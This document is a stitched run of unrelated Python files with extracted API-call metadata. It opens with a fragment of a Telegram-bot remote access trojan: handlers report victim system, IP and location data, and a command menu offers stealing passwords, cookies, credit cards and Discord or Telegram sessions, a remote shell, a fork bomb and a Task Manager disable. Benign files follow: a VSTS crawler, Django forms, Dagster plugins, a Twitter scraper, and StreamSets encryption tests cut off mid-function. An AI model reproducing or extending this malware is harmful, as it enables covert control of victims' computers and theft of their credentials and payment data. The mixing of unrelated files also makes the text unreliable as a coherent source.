'\n',
parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Failed locate target by BSSID_'
'\n'
'\n*IP Address* » `' + Geolocation('query') + '`' +
'\n*Country* » `' + Geolocation('country') + '`' +
'\n*City* » `' + Geolocation('city') + '`' +
'\n'
'\n*BSSID* » `' + GetMacByIP() + '`' +
'\n',
parse_mode='Markdown')
# System Information
@bot.message_handler(regexp='/Info')
def Info(command):
try:
bot.send_message(command.chat.id,
'\n_Computer Info_'
'\n'
'\n*System* » `' + SystemVersion + '`' +
'\n*Computer Name* » `' + ComputerName + '`' +
'\n*Computer Model* » `' + Manufacturer + '`' +
'\n*Manufacturer* » `' + Model + '`' +
'\n*System Time* » `' + SystemTime() + '`' +
'\n*Username* » `' + os.getlogin() + '`' +
'\n'
'\n'
'\n_Hardware_'
'\n'
'\n*CPU* » `' + str(CPU) +'`' +
'\n*GPU* » `' + str(GPU) +'`' +
'\n*RAM* » `' + str(RAM) +'`' +
'\n*ARM* » `' + str(ARM) +'`' +
'\n'
'\n'
'\n_Protection_'
'\n'
'\n*Started as Admin* » `' + str(Admin())+'`'+
'\n*Process Protected* » `' + str(ProcessBSODProtectionEnabled) + '`' +
'\n*Installed Antivirus* » `' + Antivirus[0] + '`',
parse_mode='Markdown')
except:
pass
# Command handler / help
@bot.message_handler(commands=['Help', 'help'])
def Help(command):
bot.send_message(command.chat.id,
'ᅠᅠᅠᅠ ⚙️ *Commands* ⚙️'
'\n'
'\n'
'\n*/Info* - _System Information_'
'\n*/Location* - _Location by BSSID_'
'\n'
'\n*/Screen* - _Desktop Capture_'
'\n*/Webcam* - _Webcam Capture_'
'\n*/Audio* - _Sound Capture_'
'\n*/Power* - _Computer Power_'
'\n*/Autorun* - _Startup Management_'
'\n'
'\n*/Files* - _Files Manager_'
'\n› */CD* - _Change Directory_'
'\n› */ls* - _List of Files_'
'\n› */Remove* - _Remove a File_'
'\n› */Upload* - _Upload File_'
'\n› */Download* - _Download File_'
'\n› */Run* - _Run File_'
'\n*/Tasklist* - _Process list_'
'\n*/Taskkill* - _Process Kill_'
'\n'
'\n*/Message* - _Send Message_'
'\n*/Speak* - _Speak Message_'
'\n*/OpenURL* - _Open URL_'
'\n*/Wallpapers* - _Set Wallpapers_'
'\n*/ForkBomb* - _Launch Programs_'
'\n'
'\n*/Discord* - _Discord Token_'
'\n*/Telegram* - _Telegram Session_'
'\n*/CreditCards* - _Get CreditCards_'
'\n*/Bookmarks* - _Get Bookmarks_'
'\n*/Passwords* - _Get Passwords_'
'\n*/Cookies* - _Get Cookies_'
'\n*/History* - _Get History_'
'\n'
'\n*/Clipboard* - _Clipboard Editing_'
'\n*/Monitor* - _Monitor Control_'
'\n*/Rotate* - _Display Rotate_'
'\n*/Freeze* - _Block Input_'
'\n*/CMD* - _Remote Shell_'
'\n'
'\n'
'\n*Coded by Bainky | @bainki 👾*',
reply_markup=menu, parse_mode='Markdown')
# Navigation buttons
@bot.message_handler(commands=['3', '6'])
def Main(command):
bot.send_message(command.chat.id, '`...`', reply_markup=menu, parse_mode='Markdown')
@bot.message_handler(commands=['2', '5'])
def Main(command):
bot.send_message(command.chat.id, '`...`', reply_markup=main5, parse_mode='Markdown')
@bot.message_handler(commands=['4', '1'])
def Main(command):
bot.send_message(command.chat.id, '`...`', reply_markup=main8, parse_mode='Markdown')
@bot.message_handler(commands=['Power', 'power'])
def Power(command):
bot.send_message(command.chat.id, '_Select an action_', reply_markup=main2, parse_mode='Markdown')
@bot.message_handler(commands=['Autorun', 'autorun'])
def Autorun(command):
bot.send_message(command.chat.id, '_Select an action_', reply_markup=main3, parse_mode='Markdown')
@bot.message_handler(commands=['Files', 'files'])
def Files(command):
bot.send_message(command.chat.id, '`...`', reply_markup=main7, parse_mode='Markdown')
@bot.message_handler(commands=['Cancel'])
def CancelFiles(command):
bot.send_message(command.chat.id, '`...`', reply_markup=main5, parse_mode='Markdown')
@bot.message_handler(commands=['Wallpapers', 'wallpapers'])
def Wallpapers(command):
bot.send_message(command.chat.id, '_Send the photo you would like to set on the wallpapers_', parse_mode='Markdown')
try:
#bot.polling(Argument)
bot.polling(none_stop=False, interval=0, timeout=20)
except:
os.startfile(CurrentPath)
sys.exit()
| [
"telebot.types.KeyboardButton",
"requests.get",
"telebot.types.InlineKeyboardButton",
"telebot.types.ReplyKeyboardMarkup",
"telebot.types.InlineKeyboardMarkup",
"sys.exit",
"telebot.util.split_string",
"telebot.util.ThreadPool",
"getmac.get_mac_address",
"telebot.TeleBot"
] | [((1321, 1366), 'telebot.TeleBot', 'telebot.TeleBot', (['TelegramToken'], {'threaded': '(True)'}), '(TelegramToken, threaded=True)\n', (1336, 1366), False, 'import telebot\n'), ((1385, 1416), 'telebot.util.ThreadPool', 'util.ThreadPool', ([], {'num_threads': '(50)'}), '(num_threads=50)\n', (1400, 1416), False, 'from telebot import util\n'), ((1425, 1452), 'telebot.types.ReplyKeyboardMarkup', 'types.ReplyKeyboardMarkup', ([], {}), '()\n', (1450, 1452), False, 'from telebot import types\n'), ((1463, 1493), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/1\n<<"""'], {}), "('/1\\n<<')\n", (1483, 1493), False, 'from telebot import types\n'), ((1504, 1534), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/2\n>>"""'], {}), "('/2\\n>>')\n", (1524, 1534), False, 'from telebot import types\n'), ((1545, 1579), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Screen\n🖼"""'], {}), "('/Screen\\n🖼')\n", (1565, 1579), False, 'from telebot import types\n'), ((1590, 1624), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Webcam\n📸"""'], {}), "('/Webcam\\n📸')\n", (1610, 1624), False, 'from telebot import types\n'), ((1635, 1668), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Audio\n🎙"""'], {}), "('/Audio\\n🎙')\n", (1655, 1668), False, 'from telebot import types\n'), ((1679, 1712), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Power\n🔴"""'], {}), "('/Power\\n🔴')\n", (1699, 1712), False, 'from telebot import types\n'), ((1723, 1758), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Autorun\n🔵"""'], {}), "('/Autorun\\n🔵')\n", (1743, 1758), False, 'from telebot import types\n'), ((1858, 1886), 'telebot.types.InlineKeyboardMarkup', 'types.InlineKeyboardMarkup', ([], {}), '()\n', (1884, 1886), False, 'from telebot import types\n'), ((1897, 1967), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Hibernate - 🛑"""'], {'callback_data': '"""hibernate"""'}), "('Hibernate - 🛑', callback_data='hibernate')\n", (1923, 1967), False, 'from telebot import types\n'), ((1978, 2047), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Shutdown - ⛔️"""'], {'callback_data': '"""shutdown"""'}), "('Shutdown - ⛔️', callback_data='shutdown')\n", (2004, 2047), False, 'from telebot import types\n'), ((2058, 2125), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Restart - ⭕️"""'], {'callback_data': '"""restart"""'}), "('Restart - ⭕️', callback_data='restart')\n", (2084, 2125), False, 'from telebot import types\n'), ((2136, 2200), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Logoff - 💢"""'], {'callback_data': '"""logoff"""'}), "('Logoff - 💢', callback_data='logoff')\n", (2162, 2200), False, 'from telebot import types\n'), ((2211, 2271), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""BSoD - 🌀"""'], {'callback_data': '"""bsod"""'}), "('BSoD - 🌀', callback_data='bsod')\n", (2237, 2271), False, 'from telebot import types\n'), ((2282, 2342), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""« Back"""'], {'callback_data': '"""cancel"""'}), "('« Back', callback_data='cancel')\n", (2308, 2342), False, 'from telebot import types\n'), ((2466, 2494), 'telebot.types.InlineKeyboardMarkup', 'types.InlineKeyboardMarkup', ([], {}), '()\n', (2492, 2494), False, 'from telebot import types\n'), ((2505, 2578), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Add to Startup - 
📥"""'], {'callback_data': '"""startup"""'}), "('Add to Startup - 📥', callback_data='startup')\n", (2531, 2578), False, 'from telebot import types\n'), ((2589, 2658), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Uninstall - ♻️"""'], {'callback_data': '"""confirm"""'}), "('Uninstall - ♻️', callback_data='confirm')\n", (2615, 2658), False, 'from telebot import types\n'), ((2669, 2729), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""« Back"""'], {'callback_data': '"""cancel"""'}), "('« Back', callback_data='cancel')\n", (2695, 2729), False, 'from telebot import types\n'), ((2796, 2824), 'telebot.types.InlineKeyboardMarkup', 'types.InlineKeyboardMarkup', ([], {}), '()\n', (2822, 2824), False, 'from telebot import types\n'), ((2835, 2905), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Yes, im sure!"""'], {'callback_data': '"""uninstall"""'}), "('Yes, im sure!', callback_data='uninstall')\n", (2861, 2905), False, 'from telebot import types\n'), ((2916, 2978), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Hell no!"""'], {'callback_data': '"""cancel"""'}), "('Hell no!', callback_data='cancel')\n", (2942, 2978), False, 'from telebot import types\n'), ((2989, 3049), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""« Back"""'], {'callback_data': '"""cancel"""'}), "('« Back', callback_data='cancel')\n", (3015, 3049), False, 'from telebot import types\n'), ((3116, 3143), 'telebot.types.ReplyKeyboardMarkup', 'types.ReplyKeyboardMarkup', ([], {}), '()\n', (3141, 3143), False, 'from telebot import types\n'), ((3154, 3184), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/3\n<<"""'], {}), "('/3\\n<<')\n", (3174, 3184), False, 'from telebot import types\n'), ((3195, 3225), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/4\n>>"""'], {}), "('/4\\n>>')\n", (3215, 3225), False, 'from telebot import types\n'), ((3236, 3270), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Screen\n🖼"""'], {}), "('/Screen\\n🖼')\n", (3256, 3270), False, 'from telebot import types\n'), ((3281, 3314), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Files\n💾"""'], {}), "('/Files\\n💾')\n", (3301, 3314), False, 'from telebot import types\n'), ((3325, 3361), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Tasklist\n📋"""'], {}), "('/Tasklist\\n📋')\n", (3345, 3361), False, 'from telebot import types\n'), ((3372, 3408), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Taskkill\n📝"""'], {}), "('/Taskkill\\n📝')\n", (3392, 3408), False, 'from telebot import types\n'), ((3502, 3530), 'telebot.types.InlineKeyboardMarkup', 'types.InlineKeyboardMarkup', ([], {}), '()\n', (3528, 3530), False, 'from telebot import types\n'), ((3541, 3619), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Kill all Processes"""'], {'callback_data': '"""taskkill all"""'}), "('Kill all Processes', callback_data='taskkill all')\n", (3567, 3619), False, 'from telebot import types\n'), ((3630, 3717), 'telebot.types.InlineKeyboardButton', 'types.InlineKeyboardButton', (['"""Disable Task Manager"""'], {'callback_data': '"""disabletaskmgr"""'}), "('Disable Task Manager', callback_data=\n 'disabletaskmgr')\n", (3656, 3717), False, 'from telebot import types\n'), ((3760, 3787), 'telebot.types.ReplyKeyboardMarkup', 'types.ReplyKeyboardMarkup', ([], {}), '()\n', (3785, 3787), False, 'from telebot import types\n'), ((3798, 3828), 
'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/CD\n🗂"""'], {}), "('/CD\\n🗂')\n", (3818, 3828), False, 'from telebot import types\n'), ((3839, 3873), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Upload\n📡"""'], {}), "('/Upload\\n📡')\n", (3859, 3873), False, 'from telebot import types\n'), ((3884, 3914), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/ls\n📄"""'], {}), "('/ls\\n📄')\n", (3904, 3914), False, 'from telebot import types\n'), ((3925, 3959), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Remove\n🗑"""'], {}), "('/Remove\\n🗑')\n", (3945, 3959), False, 'from telebot import types\n'), ((3970, 4006), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Download\n📨"""'], {}), "('/Download\\n📨')\n", (3990, 4006), False, 'from telebot import types\n'), ((4017, 4048), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Run\n📌"""'], {}), "('/Run\\n📌')\n", (4037, 4048), False, 'from telebot import types\n'), ((4059, 4090), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Cancel"""'], {}), "('/Cancel')\n", (4079, 4090), False, 'from telebot import types\n'), ((4193, 4220), 'telebot.types.ReplyKeyboardMarkup', 'types.ReplyKeyboardMarkup', ([], {}), '()\n', (4218, 4220), False, 'from telebot import types\n'), ((4231, 4261), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/5\n<<"""'], {}), "('/5\\n<<')\n", (4251, 4261), False, 'from telebot import types\n'), ((4272, 4302), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/6\n>>"""'], {}), "('/6\\n>>')\n", (4292, 4302), False, 'from telebot import types\n'), ((4313, 4347), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Screen\n🖼"""'], {}), "('/Screen\\n🖼')\n", (4333, 4347), False, 'from telebot import types\n'), ((4358, 4393), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Message\n💬"""'], {}), "('/Message\\n💬')\n", (4378, 4393), False, 'from telebot import types\n'), ((4404, 4437), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Speak\n📢"""'], {}), "('/Speak\\n📢')\n", (4424, 4437), False, 'from telebot import types\n'), ((4448, 4483), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/OpenURL\n🌐"""'], {}), "('/OpenURL\\n🌐')\n", (4468, 4483), False, 'from telebot import types\n'), ((4494, 4532), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/Wallpapers\n🧩"""'], {}), "('/Wallpapers\\n🧩')\n", (4514, 4532), False, 'from telebot import types\n'), ((4543, 4579), 'telebot.types.KeyboardButton', 'types.KeyboardButton', (['"""/ForkBomb\n⏱"""'], {}), "('/ForkBomb\\n⏱')\n", (4563, 4579), False, 'from telebot import types\n'), ((5152, 5162), 'sys.exit', 'sys.exit', ([], {}), '()\n', (5160, 5162), False, 'import sys, platform\n'), ((5582, 5592), 'sys.exit', 'sys.exit', ([], {}), '()\n', (5590, 5592), False, 'import sys, platform\n'), ((17750, 17789), 'requests.get', 'requests.get', (['URL'], {'allow_redirects': '(True)'}), '(URL, allow_redirects=True)\n', (17762, 17789), False, 'import requests\n'), ((35917, 35927), 'sys.exit', 'sys.exit', ([], {}), '()\n', (35925, 35927), False, 'import sys, platform\n'), ((13988, 14018), 'telebot.util.split_string', 'util.split_string', (['Dirse', '(4096)'], {}), '(Dirse, 4096)\n', (14005, 14018), False, 'from telebot import util\n'), ((30651, 30682), 'telebot.util.split_string', 'util.split_string', (['Output', '(4096)'], {}), '(Output, 4096)\n', (30668, 30682), False, 'from telebot import util\n'), ((8053, 8058), 
'getmac.get_mac_address', 'gma', ([], {}), '()\n', (8056, 8058), True, 'from getmac import get_mac_address as gma\n')] |
'''
Repositories.py
Get the list of code repositories from VSTS so we can
later crawl and link up pull request info and comments.
'''
# import logging
import configparser
from multiprocessing import Pool
from VSTSInfo import VstsInfo
from models import GraphBuilder, Repository, Project
class RepositoriesWorker(object):
"""
Gets the repository info from VSTS
"""
def __init__(self, request_info, vsts):
self.instance = vsts.instance
self.api_version = vsts.api_version
self.headers = vsts.get_request_headers()
self.vsts = vsts
def crawl(self, project_name):
"""
Gets Repositories for a given project
"""
url = ("%s/DefaultCollection/%s/_apis/git/repositories?api-version=%s" % (self.instance, project_name, self.api_version))
data = self.vsts.make_request(url)
for r in data["value"]:
graph = GraphBuilder().GetNewGraph()
#print(r["id"])
repo = Repository()
repo.Id = r.get("id")
repo.Name = r.get("name")
repo.Url = r.get("url")
raw_proj = r.get("project")
proj = Project()
proj.Id = raw_proj.get("id")
proj.Name = raw_proj.get("name")
proj.Url = raw_proj.get("url")
repo_proj = Project.select(graph, proj.Id)
            # TODO: may not need to do this.
if repo_proj is not None:
proj_tx = graph.begin()
proj_tx.create(proj)
proj_tx.commit()
repo.BelongsTo.add(proj)
print("Adding Repo: ")
print(repo.Name)
transaction = graph.begin()
transaction.merge(repo)
transaction.graph.push(repo)
print("Finished mapping repos")
if __name__ == '__main__':
print("starting Repositories Crawl")
#set to false for easier debugging, but it is slower
run_multithreaded = True
GRAPH = GraphBuilder()
GRAPH.create_unique_constraints()
#If you feel your cache is up to date, then set ignore_cache to False.
VSTS = VstsInfo(None, None, ignore_cache=True)
PULL_REQUEST_STATUS = "Completed"
WORKER = RepositoriesWorker(VSTS.get_request_settings(), VSTS)
if run_multithreaded:
with Pool(5) as p:
p.map(WORKER.crawl, VSTS.project_whitelist)
else:
for proj in VSTS.project_whitelist:
WORKER.crawl(proj)
| [
"models.Project.select",
"models.Repository",
"models.GraphBuilder",
"VSTSInfo.VstsInfo",
"multiprocessing.Pool",
"models.Project"
] | [((1989, 2003), 'models.GraphBuilder', 'GraphBuilder', ([], {}), '()\n', (2001, 2003), False, 'from models import GraphBuilder, Repository, Project\n'), ((2129, 2168), 'VSTSInfo.VstsInfo', 'VstsInfo', (['None', 'None'], {'ignore_cache': '(True)'}), '(None, None, ignore_cache=True)\n', (2137, 2168), False, 'from VSTSInfo import VstsInfo\n'), ((988, 1000), 'models.Repository', 'Repository', ([], {}), '()\n', (998, 1000), False, 'from models import GraphBuilder, Repository, Project\n'), ((1169, 1178), 'models.Project', 'Project', ([], {}), '()\n', (1176, 1178), False, 'from models import GraphBuilder, Repository, Project\n'), ((1333, 1363), 'models.Project.select', 'Project.select', (['graph', 'proj.Id'], {}), '(graph, proj.Id)\n', (1347, 1363), False, 'from models import GraphBuilder, Repository, Project\n'), ((2314, 2321), 'multiprocessing.Pool', 'Pool', (['(5)'], {}), '(5)\n', (2318, 2321), False, 'from multiprocessing import Pool\n'), ((912, 926), 'models.GraphBuilder', 'GraphBuilder', ([], {}), '()\n', (924, 926), False, 'from models import GraphBuilder, Repository, Project\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django import forms
from django.contrib.auth import get_user_model
from ..models import UserProfile
User = get_user_model()
class UserForm(forms.ModelForm):
class Meta:
model = User
fields = ("username", "email", "is_active")
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ("location", "timezone", "is_verified", "is_administrator", "is_moderator") | [
"django.contrib.auth.get_user_model"
] | [((180, 196), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (194, 196), False, 'from django.contrib.auth import get_user_model\n')] |
from abc import ABCMeta, abstractmethod
import six
from dagster import check
class TypeStoragePlugin(six.with_metaclass(ABCMeta)): # pylint: disable=no-init
'''Base class for storage plugins.
Extend this class for (system_storage_name, dagster_type) pairs that need special handling.
'''
@classmethod
@abstractmethod
def compatible_with_storage_def(self, system_storage_def):
raise NotImplementedError()
@classmethod
@abstractmethod
def set_object(cls, intermediate_store, obj, context, dagster_type, paths):
raise NotImplementedError()
@classmethod
@abstractmethod
def get_object(cls, intermediate_store, context, dagster_type, paths):
raise NotImplementedError()
@classmethod
def required_resource_keys(cls):
return frozenset()
class TypeStoragePluginRegistry(object):
def __init__(self, types_to_register):
from dagster.core.types.dagster_type import DagsterType
types_to_register = check.opt_list_param(types_to_register, 'types_to_register', tuple)
self._registry = {}
for type_to_register, type_storage_plugin in types_to_register:
check.inst(type_to_register, DagsterType)
check.subclass(type_storage_plugin, TypeStoragePlugin)
self.register_type(type_to_register, type_storage_plugin)
def register_type(self, type_to_register, type_storage_plugin):
from dagster.core.types.dagster_type import DagsterType
check.inst_param(type_to_register, 'type_to_register', DagsterType)
check.subclass_param(type_storage_plugin, 'type_storage_plugin', TypeStoragePlugin)
check.invariant(
type_to_register.name is not None,
'Cannot register a type storage plugin for an anonymous type',
)
self._registry[type_to_register.name] = type_storage_plugin
def is_registered(self, dagster_type):
if dagster_type.name is not None and dagster_type.name in self._registry:
return True
return False
def get(self, name):
return self._registry.get(name)
def check_for_unsupported_composite_overrides(self, dagster_type):
from dagster.core.types.dagster_type import DagsterTypeKind
composite_overrides = {t.name for t in dagster_type.inner_types if t.name in self._registry}
if composite_overrides:
outer_type = 'composite type'
if dagster_type.kind == DagsterTypeKind.LIST:
if dagster_type.kind == DagsterTypeKind.NULLABLE:
outer_type = 'Optional List'
else:
outer_type = 'List'
elif dagster_type.kind == DagsterTypeKind.NULLABLE:
outer_type = 'Optional'
if len(composite_overrides) > 1:
plural = 's'
this = 'These'
has = 'have'
else:
plural = ''
this = 'This'
has = 'has'
check.not_implemented(
'You are attempting to store a {outer_type} containing type{plural} '
'{type_names} in a object store. {this} type{plural} {has} specialized storage '
'behavior (configured in the TYPE_STORAGE_PLUGIN_REGISTRY). We do not '
'currently support storing Nullables or Lists of types with customized '
'storage. See https://github.com/dagster-io/dagster/issues/1190 for '
'details.'.format(
outer_type=outer_type,
plural=plural,
this=this,
has=has,
type_names=', '.join([str(x) for x in composite_overrides]),
)
)
def construct_type_storage_plugin_registry(pipeline_def, system_storage_def):
# Needed to avoid circular dep
from dagster.core.definitions import PipelineDefinition, SystemStorageDefinition
check.inst_param(pipeline_def, 'pipeline_def', PipelineDefinition)
check.inst_param(system_storage_def, 'system_storage_def', SystemStorageDefinition)
type_plugins = []
for type_obj in pipeline_def.all_dagster_types():
for auto_plugin in type_obj.auto_plugins:
if auto_plugin.compatible_with_storage_def(system_storage_def):
type_plugins.append((type_obj, auto_plugin))
return TypeStoragePluginRegistry(type_plugins)
| [
"dagster.check.inst_param",
"dagster.check.opt_list_param",
"dagster.check.invariant",
"dagster.check.inst",
"dagster.check.subclass",
"six.with_metaclass",
"dagster.check.subclass_param"
] | [((105, 132), 'six.with_metaclass', 'six.with_metaclass', (['ABCMeta'], {}), '(ABCMeta)\n', (123, 132), False, 'import six\n'), ((3998, 4064), 'dagster.check.inst_param', 'check.inst_param', (['pipeline_def', '"""pipeline_def"""', 'PipelineDefinition'], {}), "(pipeline_def, 'pipeline_def', PipelineDefinition)\n", (4014, 4064), False, 'from dagster import check\n'), ((4069, 4156), 'dagster.check.inst_param', 'check.inst_param', (['system_storage_def', '"""system_storage_def"""', 'SystemStorageDefinition'], {}), "(system_storage_def, 'system_storage_def',\n SystemStorageDefinition)\n", (4085, 4156), False, 'from dagster import check\n'), ((1007, 1074), 'dagster.check.opt_list_param', 'check.opt_list_param', (['types_to_register', '"""types_to_register"""', 'tuple'], {}), "(types_to_register, 'types_to_register', tuple)\n", (1027, 1074), False, 'from dagster import check\n'), ((1509, 1576), 'dagster.check.inst_param', 'check.inst_param', (['type_to_register', '"""type_to_register"""', 'DagsterType'], {}), "(type_to_register, 'type_to_register', DagsterType)\n", (1525, 1576), False, 'from dagster import check\n'), ((1585, 1672), 'dagster.check.subclass_param', 'check.subclass_param', (['type_storage_plugin', '"""type_storage_plugin"""', 'TypeStoragePlugin'], {}), "(type_storage_plugin, 'type_storage_plugin',\n TypeStoragePlugin)\n", (1605, 1672), False, 'from dagster import check\n'), ((1677, 1794), 'dagster.check.invariant', 'check.invariant', (['(type_to_register.name is not None)', '"""Cannot register a type storage plugin for an anonymous type"""'], {}), "(type_to_register.name is not None,\n 'Cannot register a type storage plugin for an anonymous type')\n", (1692, 1794), False, 'from dagster import check\n'), ((1188, 1229), 'dagster.check.inst', 'check.inst', (['type_to_register', 'DagsterType'], {}), '(type_to_register, DagsterType)\n', (1198, 1229), False, 'from dagster import check\n'), ((1242, 1296), 'dagster.check.subclass', 'check.subclass', (['type_storage_plugin', 'TypeStoragePlugin'], {}), '(type_storage_plugin, TypeStoragePlugin)\n', (1256, 1296), False, 'from dagster import check\n')] |
import sys
import base_func as base
import twint
from similar_hashtags import similar_hashtags
from top_mentions_hashtags import top_mentions_hashtags as mentions
def basic(username,search):
base.get_user_bio(username,search)
base.get_user_tweets(username,search,True)
def get_keyword(key,limit=100):
base.get_tweets(key,limit)
def top_mention():
key_val = int(input('no of users'))
seed_user = list(map(str,input('Enter usernames').strip().split()))[:key_val]
limit = int(input('No of tweets to be pulled')) # default limit = 500
for username in seed_user:
mentions.get_top_mentions_hashtags(username)
def similar_hashtag():
    key_val = int(input('no of hashtags'))
seed_hash = list(map(str,input('Enter hashtags').strip().split()))[:key_val]
limit = int(input('No of tweets to be pulled')) # default limit = 500
for seed_hashtag in seed_hash:
similar_hashtags.get_similar_hashtags(seed_hashtag, limit)
if __name__ == "__main__":
username = sys.argv[1]
string = sys.argv[2]
basic(username,string) | [
"base_func.get_user_bio",
"base_func.get_user_tweets",
"similar_hashtags.similar_hashtags.get_similar_hashtags",
"base_func.get_tweets",
"top_mentions_hashtags.top_mentions_hashtags.get_top_mentions_hashtags"
] | [((197, 232), 'base_func.get_user_bio', 'base.get_user_bio', (['username', 'search'], {}), '(username, search)\n', (214, 232), True, 'import base_func as base\n'), ((236, 280), 'base_func.get_user_tweets', 'base.get_user_tweets', (['username', 'search', '(True)'], {}), '(username, search, True)\n', (256, 280), True, 'import base_func as base\n'), ((316, 343), 'base_func.get_tweets', 'base.get_tweets', (['key', 'limit'], {}), '(key, limit)\n', (331, 343), True, 'import base_func as base\n'), ((602, 646), 'top_mentions_hashtags.top_mentions_hashtags.get_top_mentions_hashtags', 'mentions.get_top_mentions_hashtags', (['username'], {}), '(username)\n', (636, 646), True, 'from top_mentions_hashtags import top_mentions_hashtags as mentions\n'), ((914, 972), 'similar_hashtags.similar_hashtags.get_similar_hashtags', 'similar_hashtags.get_similar_hashtags', (['seed_hashtag', 'limit'], {}), '(seed_hashtag, limit)\n', (951, 972), False, 'from similar_hashtags import similar_hashtags\n')] |
# Copyright 2019 StreamSets Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import json
import logging
import pytest
from streamsets.testframework.markers import aws, sdc_min_version
from streamsets.testframework.utils import get_random_string
from streamsets.testframework.utils import Version
logger = logging.getLogger(__name__)
MESSAGE_TEXT = 'ABCDEF'
@pytest.fixture(scope='module')
def sdc_common_hook():
def hook(data_collector):
data_collector.add_stage_lib('streamsets-datacollector-crypto-lib')
return hook
@aws('kms')
@sdc_min_version('3.5.0')
def test_field_decrypt(sdc_builder, sdc_executor, aws):
"""Basic test to verify Encrypt and Decrypt Fields processor can decrypt a field.
    An encrypted field is sent, and after the pipeline is run, decryption is verified using the wiretap.
ciphertext is a byte array, but raw data source provides no way to specify a byte array.
Hence a base64 encoded string of the ciphertext is used.
Once it has been loaded by the raw data source, it needs to be decoded back into a byte array
for input to the encryption processor.
The base64 decode processor requires a byte array to decode instead of a string,
hence the field type converter.
(https://streamsets.com/documentation/datacollector/latest/help/datacollector/UserGuide/Processors/Base64Decoder.html#concept_ujj_spy_kv)
The pipeline looks like:
dev_raw_data_source >> field_type_converter >> base64_decoder >> field_decrypt >> wiretap
"""
expected_plaintext = MESSAGE_TEXT.encode()
ciphertext, _ = aws.encrypt(expected_plaintext)
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='JSON',
raw_data=json.dumps({'message': base64.b64encode(ciphertext).decode()}),
stop_after_first_batch=True)
field_type_converter = pipeline_builder.add_stage('Field Type Converter', type='processor')
field_type_converter_configs = [{'fields': ['/message'], 'targetType': 'BYTE_ARRAY'}]
field_type_converter.set_attributes(conversion_method='BY_FIELD',
field_type_converter_configs=field_type_converter_configs)
base64_decoder = pipeline_builder.add_stage('Base64 Field Decoder', type='processor')
if Version(sdc_builder.version) < Version("4.4.0"):
base64_decoder.set_attributes(field_to_decode='/message', target_field='/message')
else:
base64_decoder.set_attributes(
fields_to_decode=[{'originFieldPath': '/message', 'resultFieldPath': '/message'}]
)
field_decrypt = pipeline_builder.add_stage('Encrypt and Decrypt Fields', type='processor')
field_decrypt.set_attributes(cipher='ALG_AES_256_GCM_IV12_TAG16_HKDF_SHA384_ECDSA_P384',
fields=['/message'],
frame_size=4096,
mode='DECRYPT')
wiretap = pipeline_builder.add_wiretap()
dev_raw_data_source >> field_type_converter >> base64_decoder >> field_decrypt >> wiretap.destination
pipeline = pipeline_builder.build('Field Decryption Pipeline').configure_for_environment(aws)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
actual_value = wiretap.output_records[0].get_field_data('/message')
assert actual_value == expected_plaintext
@aws('kms')
@sdc_min_version('3.5.0')
def test_field_encrypt(sdc_builder, sdc_executor, aws):
"""Baic test to verify Encrypt and Decrypt Fields processor can encrypt.
Verify by decrypting the field received from pipeline wiretap.
The pipeline looks like:
dev_raw_data_source >> field_encrypt >> wiretap
"""
expected_plaintext = MESSAGE_TEXT.encode()
